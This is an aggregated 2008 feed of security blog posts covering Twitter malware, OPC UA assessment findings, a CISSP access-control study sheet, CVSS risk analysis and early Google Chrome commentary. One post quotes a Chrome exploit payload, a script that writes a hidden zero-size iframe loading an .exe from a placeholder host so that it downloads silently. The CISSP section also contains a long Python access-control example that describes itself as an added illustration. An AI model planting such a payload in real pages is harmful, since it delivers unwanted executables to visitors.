Friday, September 5, 2008

Spliced feed for Security Bloggers Network

Twitter Targeted by Malware Distributors [Darknet - The Darkside]

Posted: 05 Sep 2008 02:15 AM CDT

This one is of interest to me as I do actually use Twitter as a microblogging service and to keep up with what various friends are up to. It’s quite an interesting web app, especially paired with something like Twitterfox in your browser and Twibble on your mobile phone. It must have made it big now though [...]

Read the full post at darknet.org.uk

Don't Hassle the Hoff: Recent Press & Podcast Coverage & Upcoming Speaking Engagements [Rational Survivability]

Posted: 04 Sep 2008 11:05 PM CDT

Here is some of the recent press coverage on topics relevant to content on my blog:

  • Information Week: Virtualization Has A Security Blind Spot
  • Information Week: Securing Virtualization, or is that Virtualizing Security?
  • Network World: Black Hat speakers expose virtualization, OS security gaps (**NOTE: Please see here, VERY important)
  • Network World/Computerworld: Black Hat spotlights virtualization, DNS issues (**NOTE: Please see here, VERY important)
  • SearchSecurity (Australia): Could securing virtualised environments destroy ROI?
  • SearchSecurity: Initial virtualization costs could outweigh benefits
  • Computer Zeitung: Today's Security Products Aren't Ready For Virtualised Data Centres
  • Wall Street Journal: Hackers On the Move
  • Baseline: Managing Mobility In the Enterprise
  • ITWorld: Pros and Cons of VMware's New Security Guide

Podcasts/Webcasts/Video:

I am confirmed to speak at the following upcoming events:

I will be attending the following events:

/Hoff

Wisdom from Randy Pausch [Kees Leune]

Posted: 04 Sep 2008 08:16 PM CDT

Everyone who reads this post has probably heard of Dr. Randy Pausch's world famous "Last Lecture". Anyone who has not heard of it must stop reading now and go view it.
When the news came of Pausch's death on July 25, the editors of Communications of the ACM felt there could be no greater tribute than to share his own words[...]

What about advice for CS teachers and professors?

That it's time for us to start being more honest with ourselves about what our field is and how we should approach teaching it. Personally, I think that if we had named the field "Information Engineering" as opposed to "Computer Science", we would have had a better culture for the discipline. For example, CS departments are notorious for not instilling concepts like testing and validation the way many other engineering disciplines do.

Source: Wisdom from Randy Pausch, Leah Hoffmann. Communications of the ACM, September 2008, Vol. 51, No 9, p19. (full text pdf, account required)

What else is there to say?

As information security professionals, we are faced with this every day.

One might even leap to the conclusion that had the field been approached as a mature engineering discipline, there would be no need to have as many dedicated security professionals as we do now.

An article well worth reading.

OPC UA: Part 2 - Positive Findings [Digital Bond]

Posted: 04 Sep 2008 02:00 PM CDT

Security assessments by their nature focus on negative findings that could lead to vulnerabilities, and the preponderance of our report focused on what Digital Bond viewed as security deficiencies in the OPC UA specification and SDK code. That said, there are numerous examples of positive findings and text in the report. In fact, there is no comparison between the security in OPC UA and the security of any other control system protocol, with the possible exception of Secure DNP3 and its IEC equivalent. The OPC Foundation should be commended for their security efforts and pressure should be applied to other protocols to step up.

[Note: The security details of OPC UA are being written on a SCADApedia page as the OPC UA blog series is being published]

The major positive security findings are:

  • The OPC UA specification supports options for the use of encryption for confidentiality and signatures for source authentication and integrity. Asset owners using OPC UA will be able to secure client / server communication using the protocol itself rather than add-on security.
  • OPC UA uses a profile approach for specifying functionality including the crypto algorithms and key lengths. This provides flexibility and extensibility. For example, a country or industry sector may develop a new algorithm or select a set of algorithms and parameter settings. These could be listed as a new profile without changing the OPC UA specification. Additionally, the current profiles have leveraged existing, vetted crypto primitives and algorithms rather than try to tackle the difficult process of developing a new security algorithm. Smart choice. [Slight negative - we would have liked to see elliptic curve cryptography because of its computational and message overhead efficiency, but it was not included in the additional profiles due to patent and licensing issues].
  • The overall code quality of the OPC UA SDK was very good. The code base is surprisingly clean of vulnerabilities for a code base of its size. In fact, it is among the cleanest code Digital Bond has seen in the control system space. The code is well written, easy to follow and contains good use of comments. Many common coding errors were not found. For example, there were no off-by-one buffer overflows found, very limited use of insecure function calls, and good boundary checking of buffers both on the stack and on the heap. There are a number of well-written OPC wrappers of common C functionality. Comments in the code remind developers to use safe functions.
  • The security event logging required by the specification will be a fantastic help to attack detection and after-incident analysis. It is the best the Digital Bond team has seen in this space by far.

See the rest of the OPC UA Blog Series:

  • Part 1: Intro
  • Part 2: Positive Findings
  • NEXT: Part 3: Specification Vulnerabilities
  • Part 4: SDK Vulnerabilities
  • Part 5: OPC UA Vendor Implementation Vulnerabilities
  • Part 6: Asset Owner Tip Sheet to Analyzing The Security of Competitive OPC UA Servers
  • Part 7: Specification and SDK Improvements

Protesting Now Considered Terrorism [The Falcon's View]

Posted: 04 Sep 2008 01:41 PM CDT

terrorism 1. the use of violence and threats to intimidate or coerce, esp. for political purposes. 2. the state of fear and submission produced by terrorism or terrorization. 3. a terroristic method of governing or of resisting a government. Blocking...

CISSP Study Sheet Access Control [SecurePuter]

Posted: 04 Sep 2008 01:35 PM CDT

Series: CISSP Study Sheet
Entry: Access Control

The CISSP Study Sheet Series identifies the most important details regarding each individual domain within the Common Body of Knowledge. You will want to expand your preparation beyond these study sheets, such as my top 3 favorite CISSP study resources. The intent of this study sheet is to act as a last minute cram of the most significant principles, theories, formulas, and terms for each domain. I recommend reading the CISSP study sheets just before the test, and then doing a "brain dump" of notes for the first 15 minutes onto the paper issued with the CISSP exam. Hopefully, you will have remembered enough to have created an authorized cheat sheet. This second study sheet will focus on the Access Control domain.

Access Control Study Sheet

Access Control Attacks – Denial of Service, wardialing, brute force, shoulder surfing, dumpster diving, sniffing, spoofing, and dictionary attacks.
Identity Management – centralized technologies designed to control access rights of specific identities, such as directories (LDAP, NIS, or DNS).
Data Classification – a multitier labeling of information that dictates how a piece of data should be treated.

Identification – unique usernames recognized on computer systems.
Authentication – proof of the claimed identity. Something you know…Something you have…Something you are.
Authorization – what the identity is permitted to do.
Accountability – the use of such things as audit trails to hold the user responsible for their activity.

Who you are… Ok, you are you…What can you do…What you did.

Preventative – access controls enabled to stop unwanted actions by blocking the ability to do them.
Detective – access controls that identify the unwanted actions after they have occurred.
Corrective – access controls which cure the enabling of unwanted actions and restore previous conditions.
Directive – government laws and organizational policy that determines what is allowable.
Deterrent – the repercussions of not following directives.
Recovery – access controls involving the restoration of computing resources after an incident.
Compensating – backup and contingency controls that reinforce normal operations.

Least Privilege – allowing for only the minimum resources needed to accomplish tasks.
Need to Know – not everyone with a secret clearance needs to know everything classified at secret. Certain information should remain only with the persons required to know it.
Separation of Duties – requires collusion of two or more people to commit fraud instead of a single entity having control of complete transactions.

Administrative – access controls related to policies and personnel, such as separation of duties and procedures.
Technical – logical access controls utilizing software and hardware solutions, such as encryption.
Physical – environmental and material access controls, such as doors and locks.

All Access Controls should default to no access.

Password – most used form of access control, but susceptible to brute force and dictionary attacks.
Passphrase – a series of words converted into a password that is not as vulnerable as a simple password.
Password Synchronization – allows users to access multiple systems with one password.
Self Service Password – the ability for users to reset their own passwords without administrative assistance.
Assisted Password Reset – Identification and authentication of a user prior to password reset. Usually through a question and answer process.
One Time Password – a time based synchronous changing of passwords to avoid shoulder surfing and replay attacks.
Single Sign On – centralized authentication database that gives access to numerous resources from one authentication, such as SESAME.
Kerberos – an SSO protocol using a ticket from the key distribution center for authentication in a single security domain. The ticket granting service then generates new tickets with the session keys.

Discretionary Access Control (DAC) – data owner designated access via identity permissions of users or groups.
Mandatory Access Control (MAC) – sensitivity labeling of information to restrict access to an object from unauthorized users via two label attributes.
Role Based Access Control (RBAC) – a form of DAC that uses the owner's discretion to categorize access based on a user's specific function or role.
Content Dependent Access Control – an object's content is analyzed by an arbiter program to determine access privileges.
Nondiscretionary Access Control – role based access control managed by the system’s administrator rather than the data owner.

Centralized Access Control – One individual, device, or group makes the decision for network access, such as RADIUS, TACACS+, and Diameter.
Decentralized Access Control – the network access decision is distributed locally, such as peer to peer.

Access Control Lists (ACLs) – a common DAC that designates what users have access to an object, and what functions they are allowed to do on that object.
Capability Table – much like an ACL, but bound to a subject and lists what objects he or she can access.
Constrained User Interface – disallows the ability of a user to interact with certain objects, such as grayed out icons and database views.
Tempest – a way to combat the electrical signals in the airwaves.
Audit Logs – protected and reviewed record of user activities, system events, and application actions.
Keystroke Monitoring – a form of auditing that records every keystroke performed by a user.

Physiological Biometrics – identification and authentication controls recognizing physical characteristics, such as fingerprints and retina scans.
Behavioral Biometrics – identification and authentication controls recognizing mannerisms, such as voice inflections and keyboard strokes.
Biometrics Type I error – rejection of an authorized individual.
Biometrics Type II error – imposter was authenticated.
Smart Card – a physical access control device for authentication.

User Provisioning – creation, maintenance, and removal of user attributes in systems, applications, and directories.
HR database – having been developed first and being maintained by personnel, the HR database is the primary source for user identification.

Intrusion Detection System (IDS) – monitors events in real time to detect intrusion attempts via statistical or signature based analysis, and alerts administrators of a possible attack.
Intrusion Prevention System (IPS) – acts as an IDS but also has advanced capability to stop or prevent attacks.
Host Based IDS & IPS – analyzes single computers for suspicious activity using audit logs and processing irregularities.
Network Based IDS & IPS – analyzes network packets, discards dangerous traffic, and alerts administrators.
Penetration Testing – a series of steps used to bypass systems security controls to gain unrestricted access to systems and data.

Degaussing – returns media to its original state through magnetism.
Phishing – a social engineering attempt to gather sensitive information.
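To make the model definitions on this sheet concrete, here is an added worked example (my own illustration, not code from the study sheet or from any product) of a toy reference monitor that combines them: a MAC label with two attributes (level and category set) that the subject's clearance must dominate, DAC expressed both as a per-object ACL and as the equivalent subject-bound capability table, a nondiscretionary RBAC mapping set by an administrator, a separation-of-duties check, and the "default to no access" rule for anything not explicitly granted. All users, objects, labels and roles are constructed sample data.

```python
"""Toy reference monitor: MAC dominance + DAC (ACL / capability table) + RBAC,
with default deny. Added illustration; every subject, object and label below is
constructed sample data, not taken from the study sheet or any real system."""
from dataclasses import dataclass, field

# Ordered sensitivity levels for the MAC "level" attribute (constructed).
LEVELS = {"unclassified": 0, "confidential": 1, "secret": 2, "top secret": 3}


@dataclass(frozen=True)
class Label:
    level: str
    categories: frozenset = frozenset()  # second MAC attribute: need-to-know compartments

    def dominates(self, other: "Label") -> bool:
        """Subject label dominates object label when its level is at least as
        high AND its categories include all of the object's categories."""
        return (LEVELS[self.level] >= LEVELS[other.level]
                and self.categories >= other.categories)


@dataclass
class Obj:
    name: str
    owner: str
    label: Label
    acl: dict = field(default_factory=dict)  # DAC: user -> set of rights, owner-managed


# Subjects: clearance labels (MAC) and roles (RBAC). Constructed sample data.
CLEARANCE = {
    "alice": Label("secret", frozenset({"crypto"})),
    "bob": Label("secret", frozenset()),          # secret, but no crypto need-to-know
    "carol": Label("confidential", frozenset()),
}
ROLES = {"alice": {"analyst"}, "bob": {"analyst", "auditor"}, "carol": {"clerk"}}
# Nondiscretionary RBAC: the administrator, not the owner, maps role -> object -> rights.
ROLE_RIGHTS = {"auditor": {"audit.log": {"read"}}}

OBJECTS = {
    "design.doc": Obj("design.doc", "alice", Label("secret", frozenset({"crypto"})),
                      acl={"alice": {"read", "write"}, "bob": {"read"}}),
    "audit.log": Obj("audit.log", "root", Label("confidential", frozenset())),
}


def capability_table(user: str) -> dict:
    """Invert the per-object ACLs into the subject-bound capability view."""
    return {o.name: o.acl[user] for o in OBJECTS.values() if user in o.acl}


def dac_allows(user: str, obj: Obj, right: str) -> bool:
    return right in obj.acl.get(user, set())


def rbac_allows(user: str, obj: Obj, right: str) -> bool:
    return any(right in ROLE_RIGHTS.get(role, {}).get(obj.name, set())
               for role in ROLES.get(user, ()))


def check_access(user: str, obj_name: str, right: str) -> tuple:
    """Default deny: unknown subject/object fails; MAC must hold first, then
    at least one explicit DAC or RBAC grant is required. Returns (allowed, reason)."""
    obj = OBJECTS.get(obj_name)
    clearance = CLEARANCE.get(user)
    if obj is None or clearance is None:
        return (False, "unknown subject or object: default no access")
    if not clearance.dominates(obj.label):
        return (False, "MAC: clearance does not dominate object label")
    if dac_allows(user, obj, right):
        return (True, "DAC: ACL grant")
    if rbac_allows(user, obj, right):
        return (True, "RBAC: role grant")
    return (False, "default no access")


def separation_of_duties_ok(initiator: str, approver: str) -> bool:
    """A transaction needs two distinct known identities; one person may not
    both initiate and approve it."""
    return (initiator != approver and initiator in CLEARANCE
            and approver in CLEARANCE)


if __name__ == "__main__":
    for req in [("alice", "design.doc", "read"), ("bob", "design.doc", "read"),
                ("bob", "audit.log", "read"), ("alice", "audit.log", "read"),
                ("carol", "design.doc", "read"), ("mallory", "design.doc", "read")]:
        print(req, "->", check_access(*req))
    print("bob's capability table:", capability_table("bob"))
    print("SoD alice/bob:", separation_of_duties_ok("alice", "bob"),
          "alice/alice:", separation_of_duties_ok("alice", "alice"))
```

The instructive case is bob reading design.doc: the owner's ACL grants him read, but his clearance lacks the crypto category, so the MAC check refuses before DAC is ever consulted. Conversely alice can read audit.log by clearance and has no ACL entry or role grant for it, so the default-deny rule applies.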

More CISSP Study Sheets and other CISSP resources.

The Daily Incite - September 4, 2008 [Security Incite Rants]

Posted: 04 Sep 2008 08:15 AM CDT

Today's Daily Incite

September 4, 2008 - Volume 3, #74

Good Morning:
After seeing so many live music shows this year, the sizzle is waning. Sure, it's great to see fantastic, charismatic singers. And folks that can make sounds come out of guitar that boggle the mind. But while I was seeing My Morning Jacket last week or John Mayer over the weekend, I didn't focus on the guitarists (as good as they are). I wanted to pay attention a bit to the unsung heroes that make live music happen.
The anonymous bass player
That's right, let's hear it for the rhythm section - the bass guitarist and the drummer. With very rare exceptions you don't go see a band because you like the bass player or the drummer. Of course, you go to see Rush to remind yourself how great Neil Peart is. I think that Sting guy may be able to sing also. But beyond that, who is the drummer? Who is the bass player?

So at the last two shows I tried my best to pay more attention to the bass player and the drummer. They were good. MMJ's drummer had long hair that seemed to do more damage to the cymbals than his drum sticks. John Mayer's bass player kept the rhythm going, but now a few days after the show, I couldn't tell you what that guy looked like. I guess I'm like everyone else. It's the shiny objects that are memorable, not the rhythm section.

The guitarists get all the money and the chicks (or guys if they swing that way). So this weekend let's try not to forget these other folks, even if they are entirely forgettable. Go find a bass player or a drummer and thank them for the labor they provide during every live show. Tell them without their contributions, you'd only have half a band. Half a band sounds like crap. 

And then get back to staring at the guitarist. Man, those guys can play!

Have a great weekend. 

Photo: "bass player" originally uploaded by davidex


Top Security News

All that glitters isn't Chrome
So what? - So Google goes and releases a "browser" and the entire Internet is all aflutter. Open Source, ooooh. New JavaScript engine, ahhhh. It's even secure! OK, maybe not, since it seems someone ran a fuzzer on it and found some vulnerabilities already. Not that it wasn't expected, but it's still funny. Evidently the browser works OK, according to the folks that have played with it. Dennis Fisher figures it won't make a huge dent in market share beyond the digit heads, Mitchell is bitching about having to Q/A another browser platform. Do I think this is earth shattering? Nope. But it's clear that the underlying OS will just be a host for a variety of "application" platforms that are optimized for specific use cases. Chrome will be one, maybe Firefox another, maybe you'll get developers extending Chrome to optimize it for their own environments. And it won't matter if you run Windows or Mac OS X or even Linux on your device. This will likely accelerate the marginalization of the OS, and that's a good thing. Amrit is on the right track about this being a "platform" more than anything else. But let's not anoint Chrome as the best thing since sliced bread from a security standpoint until it's been proven. Google does beta stuff pretty well and until I can get NoScript type of functionality (and a Mac version), I'll be waiting on the sidelines.

Private browsing - so much for snooping on your folks
So what? - A lot of organizations have deployed user web monitoring, I mean web filtering, in order to make sure their users stay productive. That's how they justified the expense anyway. You have a gateway and it stops users from going to "bad" sites that would burn up most of their day (Facebook anyone?). You also could enforce your acceptable use policies based upon cookies and other cache items left on the browser during an investigation. But now everyone is taking Apple's lead and adding a pr0n mode, I mean privacy mode, to their browsers. Maybe that's why most of the Apple users I know are a lot happier than those suffering through with IE. IE8 will have it, and so will Google Chrome. So aside from allowing boys to be boys, what are the risks of these private browsers? Basically these do cut off a significant information source for investigations. As Seltzer points out, it's not clear what the real impact will be for compliance purposes and monitoring technology usage by employees. But all is not lost, since we can still monitor the network. You also may want to (try to) enforce the usage of a VPN for remote employees, so their web traffic is routed through your network. Then you can monitor that too. That one's a bit harder, but it's possible. The action-reaction process continues unabated. At least you know these new actions are happening, so you can plan your reactions.

What about #21: Get some hemlock...
So what? - It's happened to most of us. You are walked into the boss's or maybe the HR person's office and then notified you no longer have a job. It's pretty unsettling, though it gets easier every time it happens. Unfortunately, given the state of the global economy, this is likely to happen more frequently over the next couple of months. NetworkWorld has a good article that provides some tips for dealing with it. Basically, you can't freak out and hopefully you've been making contingency plans all along. If you work for someone else, it's kind of silly to assume things won't change in the business and that you'll always be welcome. This isn't the 1950s folks, there is no guaranteed, lifetime employment and a cushy pension at the back end of 30 years of toil and trouble. If you are too "busy" to take some action and get out and network a bit or to even develop a contingency plan, do a little visioning exercise with me. Vision that you are packing up boxes in your office. Then vision how you are going to pay the bills and keep your significant other in the lifestyle she/he has become accustomed to. Not a pretty picture, right? So make sure you are constantly thinking about what's next. Better to be safe than dealing with the repo man.

The Laundry List

  1. Secure Computing puts Securify out of their misery for $15 million and an earn out. VCs took a bath on this one, but that's life in the big city. And it goes to show even a cat only has 9 lives. - Secure Computing release
  2. Novell introduces the most "advanced compliance management" solution, which evidently is a knife to kill the auditor in the parking lot. All kidding aside, what kind of differentiator is "advanced?" - Novell release
  3. Sick of paying for AV? Build your own, just don't try to manage it for more than a desktop or two. - NetworkWorld
  4. You think Ballmer will be master of his own domain? He's under a lot of stress, you know? Maybe Seinfeld will help them fend off the Mac Guy, but probably not. No Office for You! - Dvorak MarketWatch column

Top Blog Postings

It's a big world and it takes time for them to do anything
Gunnar gnashes his teeth a bit regarding how small the aggregate software security market is. Yep, early markets are like that. You have a couple of big vendors that get 80% of the market share and a bunch of smaller ones that don't. When you add everything up, you get a market size probably 15% of a Big Security player like Check Point. The reason is simple. Everyone has a firewall. Not many do software security YET. And the yet is the point. Emerging markets are all about hype and making customers think they have problems they're not sure they have. No one questions whether they need a firewall. Of course companies should be spending more on software security, but they don't understand that yet. They haven't seen it and been beaten over the head with it for years. That's what it takes. The firewall has been around for over 15 years, software security has not. It's great the software security market is growing, but don't expect it to become very big anytime soon. Only time can make that happen.
http://1raindrop.typepad.com/1_raindrop/2008/08/software-security-market.html

First person XSS
Let me send out a hat tip to Dave Piscitello for pointing me towards Russ McRee's excellent piece on cross-site scripting in the ISSA Journal. A key to being a good defender is to understand your adversaries. So being able to put yourself into the mind of the criminal is critical to being able to defend yourself. So what do you see here from an XSS attack standpoint? Basically it's something that can happen to anyone, and it's hard (as a user) to defend against. I know I pimp NoScript a lot, but it adds a bit of XSS defense as well to your Firefox browser. From a developer standpoint, there are a few tips at the end to keep in mind. Of course, it's unlikely you are the actual developer, so you'll need to evangelize these points to your developers at every turn. Validate inputs, verify outputs, and look at both web app firewalls and code reviews. Russ forgot to tell you to keep fighting the good fight because behaviors don't change overnight and building secure applications does require a behavioral change. Note the link below is a PDF file.
http://holisticinfosec.org/publications/anatomy_of_an_xss_attack.pdf

Is there a silver lining in all these clouds?
Cloud this, SaaS that. Every day it's more crap about clouds and services, services and clouds. What's a guy, who likes to keep his feet on the ground, to do? Amrit's been busy lately. I guess spending some time in the Ashram during his Asian swing was good for his writing and time management skills. This post makes a lot of good points relative to the fact that cloud computing will require a different security model. I'm not sure what that model ultimately is, but it's different. Maybe a little different, maybe a lot different, but it's definitely different. Yet, we are still missing the point about what's most important to do now. Thankfully Amrit didn't, as he points out it's all about RECOVERING from the inevitable incident. Remember, whether you are consuming or providing cloud services, if there is a question about the reliability and/or security of those services, it takes everyone down with the ship. So make sure you focus on CONTAINING the damage as you architect these services. It will make or break your business. No joke.
http://techbuddha.wordpress.com/2008/08/29/saas-and-cloud-computing-change-the-cia-paradigm/

Seduced by technology... [Roer.Com Information Security Blog - Information security for entrepreneurs]

Posted: 04 Sep 2008 06:40 AM CDT

How can I not be seduced by technology? I am currently sitting in a bus, traveling through Norway. And using the wireless AP of the bus, I am able to work as normal! I check my email, I update my blog, and I even did a Skype call.
How can I not love this?
Security? Well, it is a good idea to use VPN, of course, as the connection is open for anyone...

Are you Owned? [Roer.Com Information Security Blog - Information security for entrepreneurs]

Posted: 04 Sep 2008 01:07 AM CDT

Anton posted about Cyber Security Plans.

I follow you 100%, Anton! There has been a large number of these hijacks lately, and it is obvious that being paranoid is not enough.

It is due time to set up your cyber security plan, and as a bare minimum I suggest it should include:

  • a list of all your profiles online, with your login.
  • a list of all your IM/e-mail and other communication tools, with login.
  • a list of other sites/tools that require you to log on.
  • The lists above should also include each site's URL or contact information for changing passwords, or in the worst case shutting them down.
  • a friends-list of who you trust, and who are willing to help you get back your own life online. The purpose is to have them help you rebuild your internet presence. Make sure you agree on some way for them to be certain that they are communicating with you, and not someone else.
  • in case you are living in a less secure part of the world, being 0wned online may also mean you are a target in the real world. A friend of mine got attacked online, and then the apartment was broken into. Nothing but memory cards, pins and similar computer storage was stolen. Makes you wonder, right?

The list will grow. Please help me - what should the Cyber Security Plan look like? What would you do if the worst happens?

XTest - VoIP Infrastructure Security Testing Tool [Darknet - The Darkside]

Posted: 04 Sep 2008 12:39 AM CDT

What is XTest? XTest is a simple, practical, and free, wired 802.1x supplicant security tool implementing the RFC 3847 EAP-MD5 Authentication method. It can be used to assess the password strength within wired Ethernet environments that rely on 802.1x to protect IP Phones and the VoIP Infrastructure against rogue PC access. XTest is developed in C...

Read the full post at darknet.org.uk

Risk and CVSS (Post 5) *FINAL* [Risktical Ramblings]

Posted: 03 Sep 2008 07:57 PM CDT

I had no idea that the CVSS topic would turn into a five post series. There was just too much information and thoughts to cram into one or even two posts so for those of you that read even a few let alone all five – thanks for persevering.

Final thoughts on CVSS; two good and two not so good:

NOT SO GOOD:

  1. The CVSS framework is probably not being *fully embraced* or properly utilized by the people that need to leverage it the most – consumers of vendors that use it to score vulnerabilities with their products. Scoring the environmental metrics and observing the impact to the base metrics could add a lot of value. Other frameworks or organizations that reference CVSS scores as part of a vulnerability management process should mention the optional metrics that can influence the base score that a vendor provides. Better yet, maybe throw in a disclaimer that the CVSS score listed today may be outdated and needs to be updated.

  2. The CVSS risk vernacular needs to be updated. I would recommend that the CVSS-SOG consider participating in "The Open Group" "Risk Management and Analysis Taxonomy" forum. Better yet, the CVSS-SOG should consider adopting the FAIR methodology. Specifically, use CVSS metrics that could factor into FAIR taxonomy elements. Some of the CVSS metrics focus more on impact than on the vulnerability itself. This can be a slippery slope especially when there are no metrics for "threat event frequency" let alone "loss event frequency".

GOOD:

  1. Pretty much all the CVSS metrics have some usefulness and should be able to be used by most information security professionals and especially risk analysts. I am already creating a small utility to use so I can consistently analyze various vulnerabilities and when appropriate – use the metrics as contributing factors for FAIR.

  2. Industry adoption. A lot of vendors use the CVSS framework. PCI-DSS references it for vulnerability related PCI guidelines. Just remember, use the whole framework and do not rely upon what is spoon-fed to you by PCI QSAs or value added resellers. If applicable, take back your ability to analyze risk and make informed decisions.

There you have it. Again, thanks for reading and submitting comments. The feedback and scrutiny has been well taken and appreciated.

Blue Box SE#026 - Astricon 2007 presentation on VoIP security and Asterisk [Blue Box: The VoIP Security Podcast]

Posted: 03 Sep 2008 06:54 PM CDT

Synopsis: Blue Box Special Edition #26: Astricon 2007 presentation - "Hacking and Attacking VoIP Systems: What you need to worry about"

Welcome to Blue Box: The VoIP Security Podcast Special Edition #26, a 55-minute podcast from Dan York and Jonathan Zar covering VoIP security news, comments and opinions.

Download the show here (MP3, 6MB) or subscribe to the RSS feed to download the show automatically. 

You may also listen to this podcast right now:

Show Content:

A year ago in September 2007, I (Dan York) spoke at Astricon 2007 in Arizona, USA, about "Hacking and Attacking VoIP Systems: What You Need To Worry About". My presentation covered a lot of the typical VoIP security threats, tools and best practices but also expanded a bit into specific security issues with Asterisk. Please do keep in mind that it has been a year since this presentation and so some of the issues I mention have been addressed. (Astricon, for those who don't know, is an annual developer conference for those who work with the Asterisk open source telephony platform. Astricon 2008 is, in fact, coming up in about 3 weeks but I will not be attending this year.)

The slides for this talk are available from Slideshare:

(And yes, at some point I'll sync the audio with the slides.)

Production assistance on this Special Edition was provided by Michael Graves who had a very tough task given the poor quality of the recording that I gave to him! Kudos to Michael for getting it to sound as good as it does.

Comments, suggestions and feedback are welcome either as replies to this post or via e-mail to blueboxpodcast@gmail.com. Audio comments sent as attached MP3 files are definitely welcome and will be played in future shows. You may also call the listener comment line at either +1-415-830-5439 or via SIP to 'bluebox@voipuser.org' to leave a comment there.

Thank you for listening and please do let us know what you think of the show.

Google Chrome Silent File Download Exploit [Hackers Center Blogs]

Posted: 03 Sep 2008 06:00 PM CDT

As I said, my previous post was destined to be outdated very soon.

This is what appeared a few minutes ago on milw0rm and packetstorm:


< script > document.write('< iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0" >'); < / script >

This script should (I haven't tested it yet, will do it later) trigger a silent download on the client machine.

Today Hacke [...]

Download the 5th Website Security Statistics Report [Jeremiah Grossman]

Posted: 03 Sep 2008 03:29 PM CDT

Whew, what a mountain of work! I'm ecstatic the complete 5th installment of our Website Security Statistics Report (all 13 pages) is finally published and available for everyone to see – and comment. I'm also extremely proud that we're able to capture a measurable improvement in overall website security. Good news from inside InfoSec!? I know, weird huh!? We still have a long way to go, but these statistics show we're on the right path and doing the right things:
  • Find and prioritize all websites
  • Find and fix website vulnerabilities
  • Implement a secure software development process
  • Utilize a defense-in-depth website security strategy

Today's webinar went extremely well, slides are available for those interested. And some quick numbers:

Total Websites: 687
Identified vulnerabilities: 11,234
Unresolved vulnerabilities: 3,541 (66% resolved)
Websites HAVING HAD at least one serious issue: 82%
Websites CURRENTLY WITH at least one serious issue: 61%
Average vulnerabilities per website: 5

The shiny new WhiteHat Top Ten

Yes! CSRF finally makes the list!

Also covered are:
- Collection methodology
- Time-to-fix and remediation metrics
- Industry vertical comparisons
- Best practices & lessons learned

Feedback on what other numbers people would like us to report on in the future is very welcome.


Crazed Bovine Traversal in RL [Room362.com]

Posted: 03 Sep 2008 01:13 PM CDT

As you may have heard me rant and rave about a special USB stick that downloads contact, messaging, and other information from phones just by plugging them in on Episode 5 of Securabit, or read about it via an earlier posting on my blog (Crazed Bovine Traversal): a company called Paraben Corporation went out and made it (Motorola and Samsung support only so far).

I first learned about it via CNet’s report “CSI Stick grabs data from cell phones” and you can find it directly on http://csistick.com/ for $199.00 plus you have to buy the accessory “DS Lite” just to read the data on it. (another 99.00). I think they should at least send me one for free for stealing my idea ;-)

 

 

Risk and CVSS (Post 4) [Risktical Ramblings]

Posted: 03 Sep 2008 12:09 PM CDT


We are now up to the CVSS "Environmental Metrics" group. According to the CVSS documentation, this group 'captures the characteristics of a vulnerability that are associated with a user's environment'. This group is also optional from a scoring perspective and is intended to be completed by someone familiar with the environment the vulnerability resides within.

In "Post 1" I mentioned that CVSS does not take into consideration "threat event frequency" or how often I expect to get attacked nor does it take into consideration "loss event frequency"; how often I expect to realize a loss. The "environmental metric" does not fill this void either – but there is still value in being able to quickly analyze vulnerability in the context of these metrics – again, as contributing factors to various FAIR risk taxonomy elements.

FAIR & CVSS "Environmental Metrics" Mapping

FAIR & CVSS

Collateral Damage Potential. This metric measures the potential for loss of life or physical assets through damage or theft of property. Now real quick, I scoffed when I saw the loss of life – and none of the risk issues I have ever dealt with ever involved estimating loss of life. However, there are real life examples of software defects (essentially vulnerabilities) that have loss of human life implications. Take a look at "Geekonomics" by David Rice; there is some fascinating information in the book that will give you a whole new perspective on vulnerabilities. Getting back on track, the collateral damage metric maps very well to the "probable loss magnitude (PLM)" branch of the FAIR taxonomy. I do not want to dive into PLM right now – but let me state this – the word potential is not the same as probable, nor does it imply expected loss. So with the CVSS metric it could be very easy for someone to err on the side of a worst case loss versus choosing a value that best resembles expected loss. Either way, with CVSS this would just result in the CVSS score being raised. I would prefer to see a value in terms of dollars; whether it is monetary ranges or actual expected loss amounts based off simulations.

Target Distribution. This metric measures the proportion of vulnerable systems. I like this metric and I think it can be very useful as a contributing factor to the FAIR taxonomy element "threat event frequency"; specifically "threat contact" and possibly "threat capability". The number and placement of vulnerable systems in my environment could directly factor into how often or what type of threat agents I expect to come into contact with the vulnerable systems – let alone attack them. Remember, within FAIR – attacking an asset with a vulnerability does not guarantee loss. We have to take into consideration the ability of the attacker to overcome the control resistance applied to the asset.

Security Requirements. These metrics enable the analyst to customize the CVSS score based on the importance of the affected IT asset to a user's organization in terms of confidentiality (CR), integrity (IR), and availability (AR). Possible values include: LOW, MEDIUM, HIGH, or NOT DEFINED. These metrics were designed to work with the CVSS "Base Metrics" group; specifically the CIA Impact metrics. So if the vendor analyst states that a vulnerability has a Confidentiality Impact, and the analyst for the organization that has the vulnerable asset states that her or his organization has a Confidentiality Requirement – then the CVSS score could increase. Sounds pretty straightforward – seems to map nicely into the PLM branch of the FAIR taxonomy. Specifically, as contributing factors to estimating loss should the vulnerability be exploited and a loss occur.

It is too bad that the CVSS environmental metrics are optional. I understand why they are, and regardless of CVSS generating a score and not taking into account loss event frequency - just imagine how much more informed security folks and decision makers could be if they took a few more minutes to analyze a given vulnerability and the CVSS score that was provided to them from a vendor in light of these metrics.

In the next (and final) CVSS post, I will share some final thoughts on CVSS and finally put a nail in what was not intended to be a series of posts. Thanks for reading!

Are the weather people disappointed? [StillSecure, After All These Years]

Posted: 03 Sep 2008 12:04 PM CDT

Is it me or do you all feel that the media people covering recent hurricanes seemed almost disappointed that Gustav and some of the other storms have not been as strong as they could have been and not as destructive?  I definitely sensed it with the coverage of New Orleans. It felt like the media had gathered for a party and it just wasn't up to the level of carnage they expected.

Today though in listening to the weather forecast on Hanna, the next storm coming up, the weather person seemed disappointed that the storm seemed to be losing muster and was not as well formed.  Hey, there is plenty of bad news to go around without worrying about a storm that fizzles out.  Why not report on the economy, the housing market or any one of the other multitude of problems out there. I for one am glad that the storms are not as bad so far!

Brass Tax on Chrome [Room362.com]

Posted: 03 Sep 2008 10:58 AM CDT

So there is already an exploit: http://blogs.zdnet.com/security/?p=1843

There are naysayers: http://www.tgdaily.com/content/view/39154/108/

And then there is the truth: http://www.stillsecureafteralltheseyears.com/ashimmy/2008/09/sucking-the-chr.html

I like the design of the tabs and address bar, but I can do that with a theme in Firefox. I want my add-ons, even with the memory problems. Chrome is great for Mom and Pop, but for “Internet Power Users” it falls lightyears short on features. So where is the brass tax?

